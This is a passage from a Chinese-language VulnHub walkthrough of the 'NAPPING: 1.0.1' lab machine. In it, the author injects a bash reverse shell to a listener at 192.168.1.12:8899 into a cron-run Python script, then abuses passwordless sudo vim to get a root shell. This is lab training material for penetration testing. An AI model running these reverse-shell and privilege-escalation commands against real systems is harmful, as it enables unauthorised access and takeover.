vulnhub靶场|NAPPING: 1.0.1( 二 )


vulnhub靶场|NAPPING: 1.0.1

文章插图

vulnhub靶场|NAPPING: 1.0.1

文章插图
发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
在/home/daniel下写入shell.sh文件,文件内容如下:
#!/bin/bashbash -c 'bash -i >& /dev/tcp/192.168.1.12/8899 0>&1'然后在query.py文件中添加对shell.sh脚本的执行,内容如下:
import osos.system('/usr/bin/bash /home/daniel/shell.sh')
vulnhub靶场|NAPPING: 1.0.1

文章插图
在kali端开启对8899端口的监听,成功获取到adrina用户的shell权限 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
 VIM提权:
在adrian用户的shell里执行sudo -l发现vim权限可以不需要root密码即可执行,那就使用vim直接写入shell,命令:sudo vim -c ':!/bin/bash',成功获取root权限shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图

vulnhub靶场|NAPPING: 1.0.1

文章插图
通过:python3 -c 'import pty;pty.spawn("/bin/bash")'升级下shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
【vulnhub靶场|NAPPING: 1.0.1】

推荐阅读